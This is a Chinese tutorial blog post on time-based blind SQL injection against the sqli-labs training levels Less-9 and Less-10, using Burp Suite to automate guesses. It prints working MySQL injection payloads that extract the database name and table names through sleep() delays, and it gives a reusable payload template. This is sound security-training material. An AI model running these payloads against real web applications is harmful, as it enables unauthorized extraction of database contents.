Less-9-10(盲注-时间盲注)

盲注-时间盲注

盲注有两种:

  1. 基于布尔的盲注
  2. 基于时间的盲注

我们之前讲到过布尔盲注,但是今天这个关卡很无赖,不管你什么条件,他就给你返回一个页面。你没法判断,因此时间盲注的重要性就体现出来了。

1. 分析问题

打开sqli网站,进入less-9。发现?id=1' and 1=1 --+?id=1' and 1=2 --+返回的结果一模一样。这样子,我们就无法判断id的类型了。因此在这里,我们使用?id=1' and sleep(5) --+发现网站返回页面有明显的延迟。
在这里插入图片描述
说明我们构造的语句生效了,而id是用单引号''包裹的。

2. 使用burp suite拦截注入

接着我们就开始注入。

2.1 破解数据库名字

首先猜当前数据库的长度:
?id=1' and if(length(database())=1, sleep(5), 1) --+
在这里插入图片描述
在这里插入图片描述
开始攻击:
在这里插入图片描述

然后我们来猜出当前使用的数据库的名字:
构造sql语句:
?id=1%27 and if( ascii(substr(database(), 1, 1))=115, sleep(5),1) --+
然后用burp suite拦截。进行参数设置
在这里插入图片描述
设置参数:
在这里插入图片描述
在这里插入图片描述
开始攻击:
在这里插入图片描述

2.2 破解所有数据库下的数据表name

首先猜当前数据库下有多少张数据表:
?id=1' and if((select count(*) from information_schema.tables where table_schema="security")=1, sleep(5), 1) --+
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
由此可得,security数据库下有四张数据表。

首先获得第一个数据表名字的长度:
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
然后判断数据表的名字。
?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema="security" limit 0, 1), 1, 1))=101, sleep(5), 1) --+
参数配置就不再展示了,直接看结果:
在这里插入图片描述
这样我们就得到了第一个表的名字。

那么后续的字段和破解和上面都是一个套路,我就不再多说了。

3. 小结

总结一下时间盲注的破解语句通用套路:
?id=1' and if((payload), sleep(5), 1) --+

4. less-10

less-10和9的套路一样,只是10的id用的是双引号,改一下就可以。

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值